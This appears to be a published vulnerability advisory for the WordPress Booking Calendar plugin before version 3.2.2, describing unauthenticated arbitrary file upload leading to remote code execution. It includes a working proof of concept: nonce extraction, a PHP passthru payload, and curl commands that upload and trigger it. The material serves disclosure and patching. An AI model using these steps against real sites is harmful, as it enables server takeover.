WordPress Plugin Vulnerabilities
Booking Calendar < 3.2.2 - Unauthenticated Arbitrary File Upload
Description
The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE
Proof of Concept
1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:
echo '<?php passthru("id"); ?>' > /tmp/poc.php
4. Upload the payload with cURL, with the previously extracted nonce:
curl -i https://example.com/wp-admin/admin-ajax.php \
-F 'action=wpdevart_form_ajax' \
-F 'wpdevart_id=x' \
-F 'wpdevart_nonce=<NONCE HERE>' \
-F 'wpdevart_data={"wpdevart-submit":"X"}' \
-F 'wpdevart-submit=1' \
-F '[email protected]/tmp/poc.php'
5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"
curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php Affects Plugins
Fixed in version 3.2.2
Fixed in version 21.1
References
Classification
Type
UPLOAD
CWE
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-11-21 (about 6 months ago)
Added
2022-11-21 (about 6 months ago)
Last Updated
2023-01-27 (about 4 months ago)